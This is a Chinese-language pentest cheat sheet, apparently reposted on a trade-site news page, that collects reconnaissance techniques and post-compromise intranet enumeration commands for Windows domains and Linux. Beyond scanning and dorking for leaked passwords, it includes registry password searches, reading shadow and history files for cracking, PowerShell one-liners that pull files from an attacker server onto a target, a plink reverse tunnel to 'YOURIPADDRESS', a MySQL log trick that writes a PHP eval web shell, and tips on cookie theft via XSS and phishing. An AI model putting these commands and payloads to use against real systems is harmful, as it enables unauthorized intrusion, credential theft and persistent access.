【安服DD信集收藏版】一本信集与内网常用命令秘籍,臭哥哥们请查收~_~【小白必备】

   日期:2020-08-27     浏览:407    评论:0    
核心提示:当你的才华还撑不起你的野心时那你就应该静下心来学习 整理这些散落在不同地方的经典文章与公众号的信息收集方法与内网常用命令,花费了个人比较多的精力,愿分享出来,与君共享,本文章涉及与未涉及的知识点,会长期进行维护...目录0x01 前期信息收集踩点0x02 GitHub 信息收集0x03 端口、邮箱、备案收集0x04 Whois 查询0x05 在线网站备案查询0x06 查找真实IP假设:如果目标网站使用了CDN,该如何找到真实IP?0x

当你的才华

还撑不起你的野心时

那你就应该静下心来学习

      提前,祝贺大家七夕单身快乐... .../流下了伤心欲绝的眼泪

      整理这些散落在不同地方的经典文章与公众号的信息收集方法与内网常用命令,花费了个人比较多的精力,愿分享出来,与君共享,本文章涉及与未涉及的知识点,会长期进行维护...

目录

0x01 前期信息收集踩点

0x02 GitHub 信息收集

0x03 端口、邮箱、备案收集

0x04 Whois 查询

0x05 在线网站备案查询

0x06 查找真实IP

假设:如果目标网站使用了CDN,该如何找到真实IP?

0x07 指纹识别

0x08 非常规操作

0x09 SSL/TLS证书查询

0x10 OSINT调查平台工具

0x11 自动化批量漏扫工具刺探+手工挖掘

内网信息探测命令

0x01 基本信息

0x02 常用端口

0x03 域内信息收集

0x04 杀毒软件进程名字

0x05 获取系统安装的软件的信息

0x06 查看启动程序信息

0x07 获取系统注册的服务信息

0x08 收集本地用户和组信息

0x09 敏感信息查找

0x10 获取本地开放的端口与连接信息

0x11 防护墙配置

0x12 查询远程连接服务

0x13 工作组信息收集

0x14 其它

0x15 域凭据收集

Linux 信息收集

0x01 版本信息

0x02 用户和组

0x03 环境信息

0x04 进程信息

0x05 服务信息

0x06 计划任务

0x07 网络、路由和通信

0x08 已安装的程序

0x09 文件

0x10 公私钥信息

0x11 日志

0x12 常见配置文件

0x01 前期信息收集踩点

Googe Hacke 搜索

如需更多搜索引擎语法前往

https://blog.csdn.net/God_XiangYu/article/details/103145225

https://blog.csdn.net/God_XiangYu/article/details/100062233

https://securitytrails.com/blog/google-hacking-techniques

以下是利用GHDB结合搜索引擎高级指令进行敏感信息获取的对应表:

a b c 自动对词进行拆分匹配 拆分标准 空格
"a b c " 把a b c 当成一个整体去查
" a*b" *通配符 里面是一个或者多个 以a开头 b结尾
"ab" -c 找到ab 不包含c
a and b 包含a和b
"ab"(c|d) ab中可能包含c或者d
intitle: xx 找标题
intext: xx 找内容
inurl: *.baidu.com  模糊搜索地址
inurl:phpmyadmin/index.php & (intext:username & password & "Welcome to")  
inanchor:修改密码 锚点描述文本
filetype:pdf 搜索
cache:baidu.com 快照 历史信息
link:xxx.com 搜索所有链接有xxx.com 链接
site:*.baidu.com 搜索这个所有域名

related: xx.com

搜索相关网站

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

0x02 GitHub 信息收集

  • 数据库信息泄露
site:github.com  root password
site:github.com  sa password
site:github.com  User ID='sa';Password
  • svn信息泄露
site:github.com  svn
site:github.com  svn password
site:github.com  svn username
site:github.com  svn username password
  • 数据库备份文件
site:github.com  inurl:sql
  • 综合信息泄露
site:github.com  password
site:github.com  ftp ftppassword
site:github.com  密码
site:github.com  内部
  • Github 信息收集
https://github.com/michenriksen/gitrob
https://securitytrails.com/blog/github-dorks

 

 

0x03 端口、邮箱、备案收集

名称                                 地址或命令
Tag1-Nmap端口扫描 nmap -sS -T4 -Pn --open -n -p- -iL ***.txt -oX ***
小蓝本 https://www.xiaolanben.com/
ThreatScan https://scan.top15.cn/web/
邮箱收集 https://www.email-format.com/
奇怪域名收集 https://archive.org/web/
Aquatone  ---子域名截图 https://github.com/michenriksen/aquatone
Github 收集 "*.com" login
"*.com" ftp
"*.com" password
"*.com" token
图标hash搜索

1. 平台
2. 领英

3. 脉脉
4. 新媒体资产

5. 抓公众号、小程序链接,能发现一堆奇奇怪怪的资产;还有抖音,支付宝商号等等

Fuzz 资产存活,但却访问不了,是因为目录不正确,收集一个高命中率的资产字典进行fuzz
Hosts碰撞

https://github.com/r35tart/Hosts_scan

用于碰撞某些绑定了host的域名进行强制匹配进行访问,跟改了本地host文件一样

JS分析

网页的JS中往往存在着奇奇怪怪的URL,里面有些参数说不定也有,意想不到的接口泄露

推荐工具JSfinder

https://github.com/Threezh1/JSFinder

客服窗口

为什么此处会说客户窗口?说不定能弹个XSS,在打点的时候可以用此处知道客户的后台地址和Cookie

0x04 Whois 查询

通过whois来对域名信息进行查询,可以查到注册商、注册人、邮箱、DNS解析服务器、注册人联系电话等,因为有些网站信息查得到,有些网站信息查不到,所以推荐以下信息比较全的查询网站,直接输入目标站点即可查询到相关信息。

名称                                      地址
站长之家域名WHOIS信息查询地址 http://whois.chinaz.com/
爱站网域名WHOIS信息查询地址 https://whois.aizhan.com/
腾讯云域名WHOIS信息查询地址 https://whois.cloud.tencent.com/
美橙互联域名WHOIS信息查询地址 https://whois.cndns.com/
爱名网域名WHOIS信息查询地址

https://www.22.cn/domain/

易名网域名WHOIS信息查询地址 https://whois.ename.net/
中国万网域名WHOIS信息查询地址 https://whois.aliyun.com/
西部数码域名WHOIS信息查询地址 https://whois.west.cn/
新网域名WHOIS信息查询地址 http://whois.xinnet.com/domain/whois/index.jsp
纳网域名WHOIS信息查询地址 http://whois.nawang.cn/
中资源域名WHOIS信息查询地址 https://www.zzy.cn/domain/whois.html
三五互联域名WHOIS信息查询地址 https://cp.35.com/chinese/whois.php
新网互联域名WHOIS信息查询地址 http://www.dns.com.cn/show/domain/whois/index.do
国外WHOIS信息查询地址 https://who.is/

0x05 在线网站备案查询

名称                          地址
小蓝本 https://www.xiaolanben.com/
天眼查 https://www.tianyancha.com/
ICP备案查询网 http://www.beianbeian.com/
爱站备案查询 https://icp.aizhan.com
域名助手备案信息查询 http://cha.fute.com/index
企查查 https://www.qcc.com/

0x06 查找真实IP

      多地ping、nslookup、DNS 历史查询、查找子域名、反向连接、利用SSL证书寻找真实IP、国外解析域名、漏洞利用、目标敏感文件泄露、扫描全网、从 CDN 入手、利用HTTP标头寻找真实原始IP、利用网站返回的内容寻找真实原始IP、F5 LTM解码法

DNS解析与Whois 查询意义何在?
(1)DNS解析记录可以反查IP,比较早的解析记录有时可以查到真实IP,需要留意一下。
(2)注册人电话,注册人邮箱等社工信息可以钓鱼或者收集进字典来爆破目标办公系统。

为何需要手机子域名?
  收集子域名可以扩大测试范围,同一域名下的二级域名都属于目标范围。

  • 常用方式

    子域名中的常见资产类型一般包括办公系统,邮箱系统,论坛,商城等,其他管理系统,网站管理后台等较少出现在子域名中。
    首先找到目标站点,在官网中可能会找到相关资产(多为办公系统,邮箱系统等),关注一下页面底部,也许有管理后台等收获。
查找目标域名信息的方法:

名称

                          用法或地址

FOFA title="公司名称"
钟馗之眼 site=域名即可
百度 intitle=公司名称
Google intitle=公司名称
   
FOFA搜索子域名 https://fofa.so/
语法:domain=”baidu.com”
Hackertarget查询子域名 https://hackertarget.com/find-dns-host-records/
注意:查询子域名可以得到一个目标大概的ip段,接下来可以通过ip来收集信息。
站长之家,直接搜索名称或者网站域名 http://tool.chinaz.com/
钟馗之眼,直接搜索名称或网站名称 https://www.zoomeye.org/

 
第三方子域名查询

名称                                      地址
子域名在线查询 https://phpinfo.me/domain/
子域名在线查询 https://www.t1h2ua.cn/tools/
IP138查询子域名 https://site.ip138.com/baidu.com/domain.htm
Layer子域名挖掘机4.2 https://www.webshell.cc/6384.html
Layer子域名挖掘机5.0

https://pan.baidu.com/s/1wEP_Ysg4qsFbm_k1aoncpg

提取码:uk1j

SubDomainBrute https://github.com/lijiejie/subDomainsBrute
Sublist3r https://github.com/aboul3la/Sublist3r
   
   


 

端口检测

名称                                                                       地址
在线端口检测 http://coolaf.com/tool/port
扫描主机端口
nmap -T5 -A -v -p- <target ip>
扫描一个IP段,探测存活主机 nmap -sP <network address> </CIDR>
探测操作系统类型
nmap -0 <target IP>
寻找登录授权页面
nmap -p 80 --script http-auth-finder <www.xxx.com>
SSH爆破
nmap -p22 --script ssh-brute <target ip>
dns 域传送漏洞
nmap -p 53 --script dns-zone-transfer.nse -v <target ip>
Masscan Masscan 127.0.0.0/24 -p443 # 单端口扫描
Masscan Masscan 127.0.0.0/24 --top-ports 100 -rate 100000 # 快速扫描
Masscan Masscan 127.0.0.0/24 --top-ports 100 --excludefile exclude.txt # 排除指定目标
Masscan Masscan 127.0.0.0/24 -p20,21,22,23,80,161,443,873,2181,3389,6379,7001,8000,8009,8080,9000,9009,9090,9200,9300,10000,50070 > results.txt

 

假设:如果目标网站使用了CDN,该如何找到真实IP?

注意:很多时候,主站虽然是用了CDN,但子域名可能没有使用CDN,如果主站和子域名在一个ip段中,那么找到子域名的真实IP也是一种途径,而且说不定子域名IP的C段就存在主域名的真实IP。
1. 部分收集真实IP,请参考如下文章
     https://blog.csdn.net/God_XiangYu/article/details/106359936
2. phpinfo、旁站和C段

     如果目标网站存在phpinfo泄露等,可以在phpinfo中的SERVER_ADDR或_SERVER[“SERVER_ADDR”]找到真实IP。

     旁站往往存在业务功能站点,建议先收集已有IP的旁站,再探测C段,确认C段目标后,再在C段的基础上再收集一次旁站。
     旁站是和已知目标站点在同一服务器但不同端口的站点,通过以下方法搜索到旁站后,先访问一下确定是不是自己需要的站点信息。

     PS:不是所有C段都是该目标服务器的,可能只是某个范围是或切割多个范围才属于该目标范围的IP段,建议先收集已有IP的旁站,再探测C段,当然有些C段,你别傻不拉几的用Goby或漏扫直接扫,有些有WAF,你线程一大就封你IP,扫或不扫,根据现场测试业务环境决定。
 

3. 网络空间搜索引擎
如FOFA搜索旁站和C段
Nmap,Msscan扫描等
例如:
       nmap -p 80,443,8000,8080 -Pn 192.168.0.0/24

网络空间搜索引擎

如果想要在短时间内快速收集资产,那么利用网络空间搜索引擎是不错的选择,可以直观地看到旁站,端口,站点标题,IP等信息,点击列举出站点可以直接访问,以此来判断是否为自己需要的站点信息。FOFA的常用语法
1、同IP旁站:ip=”192.168.0.1”
2、C段:ip=”192.168.0.0/24”
3、子域名:domain=”baidu.com”
4、标题/关键字:title=”百度”
5、如果需要将结果缩小到某个城市的范围,那么可以拼接语句
       title="百度"&& region="Beijing"
6、特征:body=”百度”或header=”baidu”

扫描敏感目录/文件

扫描敏感目录需要强大的字典,需要平时积累,拥有强大的字典能够更高效地找出网站的管理后台,敏感文件常见的如.git文件泄露,.svn文件泄露,phpinfo泄露等,这一步一半交给各类扫描器就可以了,将目标站点输入到域名中,选择对应字典类型,就可以开始扫描了,十分方便
1、御剑
https://www.fujieace.com/hacker/tools/yujian.html
2、7kbstorm
https://github.com/7kbstorm/7kbscan-WebPathBrute
3、bbscan
https://github.com/lijiejie/BBScan
4、dirmap
https://github.com/H4ckForJob/dirmap
5、dirsearch
https://github.com/maurosoria/dirsearch
6、Github搜索

0x07 指纹识别

收集网站信息,对网站进行指纹识别,通过识别指纹,确定目标的cms及版本

   
云悉 http://www.yunsee.cn/info.html
潮汐指纹 http://finger.tidesec.net/
CMS指纹识别 http://whatweb.bugscaner.com/look/


0x08 非常规操作

1. 如果找到了目标的一处资产,但是对目标其他资产的收集无处下手时,可以查看一下该站点的body里是否有目标的特征,然后利用网络空间搜索引擎(如fofa等)对该特征进行搜索,如:body=”阿里XX”或body=”aliyun”等。
该方式一般适用于特征明显,资产数量较多的目标,并且很多时候效果不错

2. 通过上述方式的找到aliyun.com的特征后,再进行body的搜索,然后再搜索到aliyun.com的时候,此时fofa上显示的IP大概率为aliyun.com的真实IP。
3. 如果需要对政府网站作为目标,那么在批量获取网站首页的时候,可以用上如下地址来查询
     全国政府网站基本信息数据库

0x09 SSL/TLS证书查询

      SSL/TLS证书通常包含域名、子域名和邮件地址等信息,结合证书中的信息,可以更快速地定位到目标资产,获取到更多目标资产的相关信息。

名称 地址
亚洲诚信-SSL/TLS安全评估 https://myssl.com/

AUTO-EARN

https://github.com/Echocipher/AUTO-EARN

0x10 OSINT调查平台工具

 

名称 地址
iKy

https://kennbroorg.gitlab.io/ikyweb/

PS:电子邮件收集信息并以漂亮的可视界面显示结果的工具

Boardreader

https://boardreader.com/

PS:搜索全球各个论坛平台的内容。

blackhat线上会议 https://www.blackhat.com/us-20/briefings/schedule/
CTFR

https://github.com/UnaPibaGeek/ctfr

滥用证书透明度日志,允许在几秒钟内获取子域。

DNS 聚合器 https://dnsdumpster.com/

0x11 自动化批量漏扫工具刺探+手工挖掘

            网上有很多【Github】工具,此处就不介绍了,例如Goby+xray、AWVS等等

                                                                                             分割线

内网信息探测命令

0x01 基本信息

  • 获取主机名
hostname
echo %COMPUTERNAME%
  • 系统体系架构
echo %PROCESSOR_ARCHITECTURE%
  • 获取所属域信息
systeminfo

systeminfo /S 192.168.1.101 /U testlab\test /P "test"  查看远程机器的系统配置
  • 查看补丁信息
systeminfo/wmic qfe get caption,description,hotfixid,installedon
  • 获取环境变量
set
  • 获取IP地址(查看网络配置)
ipconfig /all
  • 查看安装软件的版本
wmic product >secbang.txt  # 使用wmic命令,把结果输出到txtGet-UnattendedInstallFile
powershell "Get-WmiObject -class Win32_Product |Select-Object -Property name,version"
  • 获取当前用户名
whoami  或 echo %USERNAME%
whoami /all   # 查看当前用户权限
  • 查看注册表中的密码
reg query HKCU /f password /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s
  • 查看路由器信息
route print
  • 查看本地DNS缓存
ipconfig /displaydns
  • 跟踪本机出口ip
tracert 8.8.8.8
  • 查看ARP 缓存(查找有价值的内网arp通信记录)
arp -a
  • 查看是否连接到其它主机
netstat -ano
  • 查看hosts文件
C:\WINDOWS\System32\drivers\etc\hosts
  • 查看接口配置
netsh dump
  • 查看SNMP配置
reg query HKLM\SYSTEM\CurrentControlSet'Services\SNMP /s
  • 查看代理
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
  • 查看本机共享列表
net share,wmic share get name,path,status 

 

0x02 常用端口

端口号 端口说明 利用技巧
21/22/69 FTP/TFTP:文件传输协议 爆破、嗅探、文件传输
22 SSH:远程连接 爆破、SSH隧道内网转发、文件传输
23 Telnet:远程连接 爆破、嗅探
25 SMTP:邮件服务 邮件伪造
53 DNS:域名系统 DNS区域传输\DNS劫持\DNS缓存投毒\DNS欺骗\利用DNS隧道技术刺透防火墙
67/68 DHCP 劫持、欺骗
110 pop3 爆破
139 Samba 爆破、未授权访问、远程代码执行
143 IMAP 爆破
161 SNMP 爆破
389 LDAP 注入攻击、未授权访问
512/513/514 linux rexec服务 爆破、远程登录
873 rsync服务 未授权访问
1352 Lotus Domino邮件服务 爆破:弱口令、信息泄漏:源代码
1433 MSSQL 注入、SA弱口令爆破、提权
1521 Oracle 注入、TNS爆破
2049 NFS 配置不当
2181 ZooKeeper服务 未授权访问
3306 MySQL 注入、提权、爆破
3389 RDP 爆破、Shift后门、0708
4848 GlassFish控制台 爆破:控制台弱口令、认证绕过
5000 Sybase/DB2数据库 爆破、注入
5432 PostgreSQL 缓冲区溢出、注入、爆破:弱口令
5632 PcAnywhere服务 抓密码、代码执行
5900 VNC 爆破:弱口令、认证绕过
6379 Redis 未授权访问、爆破:弱口令
7001、7002 WebLogic控制台 Java反序列化、控制台弱口令+部署webshell
80/443 Web 常见web攻击、对应服务器版本漏洞
8080/8089 JBoss/Resin/Jetty/Jenkins 反序列化、控制台弱口令
8069 Zabbix 远程命令执行
9090 WebSphere控制台 爆破:控制台弱口令、Java反序列
9200/9300 Elasticsearch服务 远程代码执行
11211 Memcacache 未授权访问
27017、27018 MongoDB 爆破、未授权访问

0x03 域内信息收集

  • 通过查询系统详细信息来判断是否存在域
systeminfo|findstr "Domain"
systeminfo|findstr "域"
  • 查看指定用户在当前域中的详细属性信息
net user Agan /domain
  • 查看当前域中的所有用户名,根据用户名总数大概判断域的规模
net user /domain
  • 查看时间服务器,一般域控会做时间服务器
net time /domain
  • 查看域或工作组中的计算机列表(查看所有的域名称)
net view /domain
  • 查看指定域中在线的计算机列表
net view /domain:domain_name
  • 获取域分组
net group /domain
  • 查看当前域中的域管账户
net group "domain admins" /domain
  • 查看当前域中的所有的计算机名(登录过该域的计算机)
net group "domain computers" /domain
  • 查看域控
net group "domain controllers" /domain 
  • 查看域控机器名
nltest /DCLIST:域名  
  • 查看域控主机名
nslookup -type=SRV \_ladp._tcp 
  • 查看域控制器IP
dsquery server
  • 查看域控制器组
net group "Domain Controllers" /domain,netdom query pdc 
  • 查看域内信任关系
nltest /domain_trusts
  • 查看当前域的域内账户密码设置策略
net accounts /domain 
  • 查看看当前的登录域
net config workstation 
  • 查看当前域中在线的机器,不太直观,批处理把机器名对应的ip也显示出来
net view

----
WIN10下使用Net view会出现如下报错
System error 1231
System error 6118
解决:https://social.technet.microsoft.com/Forums/en-US/6f102ed1-8e76-4cb7-8dec-05714466d441/net-view-system-error-1231?forum=win10itpronetworking
----
  • ※【DC执行】导出域内DNS信息
dnscmd /zoneexport hack7.local dns.txt 
  • 查看域内邮件服务器
nslookup -q=mx agan1.local
  • 查看域内DNS服务器
nslookup -q=ns agan1.local 
  • 查看域内的主域控,仅限win2008及之后的系统
netdom query pdc
  • dsquery导出域信息
利用dsquery 工具搜集域内信息,域成员机器需要自己传上去

dsquery computer    # 查看当前域内的所有机器,dsquery工具一般在域控上才有,不过你可以上传一个dsquery
dsquery user        # 查看当前域中的所有账户名
dsquery group       # 查看当前域内的所有组名
dsquery subnet      # 查看到当前域所在的网段,结合nbtscan使用
dsquery site        # 查看域内所有的web站点
dsquery server      # 查看当前域中的服务器(一般结果只有域控的主机名)
dsquery user domainroot -name admin* -limit 240    # 查询前240个以admin开头的用户名
  • csvde导出域信息
拥有一个当前有效的域用户账户及密码时,使用如下命令
csvde.exe –f c:\windows\temp\e.csv –n –s 192.168.1.100(DC的IP) –b 域用户名 域名 域用户密码
如果拥有使用域成员主机的system权限或者当前就在DC上
csvde.exe –f c:\windows\temp\e.csv –n –s 192.168.1.100(DC的IP)
  • SPN扫描
setspn -T target.com -Q **  # win自带命令完成扫描
或  
setspn  -Q  *
  • 数据库配置文件、历史记录等
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
  • 下载shadow 爆破密码
mkdir /root/.john
cd /root/.john
unshadow passwd.txt shadow.txt > hash.txt

 

PS:

  • 在提权过程中,你需要将文件放到你的目标上

Powershell Cmdlet(Powershell 3.0及更高版本):
Invoke-WebRequest "https://myserver/filename" -OutFile "C:\Windows\Temp\filename"
Powershell One-Liner:
(New-Object System.Net.WebClient).DownloadFile("https://myserver/filename","C:\Windows\Temp\filename")

  • 开放SMB 端口转发

plink.exe -l root -pw password -R 445:127.0.0.1:445 YOURIPADDRESS

  • 慢日志写SHell

set global general_log='on' 
set global general_log_file='D:\\phpStudy4IIS\\WWW\\slow_log.php' #一定要使用 '\\'
select "<?php eval($_POST[angel])?>"

 

参考链接:

                    https://mp.weixin.qq.com/s/0-UpfCvUVzXZkTAEHHrdhQ

                    https://github.com/ZTHacker/Penetration_orders

                    https://mp.weixin.qq.com/s/LnjKK1YJ7BvMXPuFbeq37w

                    https://mp.weixin.qq.com/s/DNJPQdHzBSYx0s3YcPFOiQ

                    https://mp.weixin.qq.com/s/zQmd2QeiK4Ggkx6rLH724A

                    https://mp.weixin.qq.com/s/9ZwsdxGXscUv59oFpDhfIQ

                    https://mp.weixin.qq.com/s/7_XGgcUnGE8N73qP-tKjtg

                    https://mp.weixin.qq.com/s/I8sfpRvtQWP7GiqSILwcaw

                    https://mp.weixin.qq.com/s/pK4j81VuUh4WuOiJ26uJHQ

                    https://mp.weixin.qq.com/s/D6QLlN5ew8IbUp32TznUAQ

                    https://mp.weixin.qq.com/s/eX6RmlcinT8nKXkEgbdTlA

                    https://mp.weixin.qq.com/s/f0dyixyPpGujWuWWwbLDqQ

                    https://mp.weixin.qq.com/s/30xOtFsstX4wemiRKoMMwQ

虽然我们生活在阴沟里,但依然有人仰望星空!

 

 
打赏
 本文转载自:网络 
所有权利归属于原作者,如文章来源标示错误或侵犯了您的权利请联系微信13520258486
更多>最近资讯中心
更多>最新资讯中心
0相关评论

推荐图文
推荐资讯中心
点击排行
最新信息
新手指南
采购商服务
供应商服务
交易安全
关注我们
手机网站:
新浪微博:
微信关注:

13520258486

周一至周五 9:00-18:00
(其他时间联系在线客服)

24小时在线客服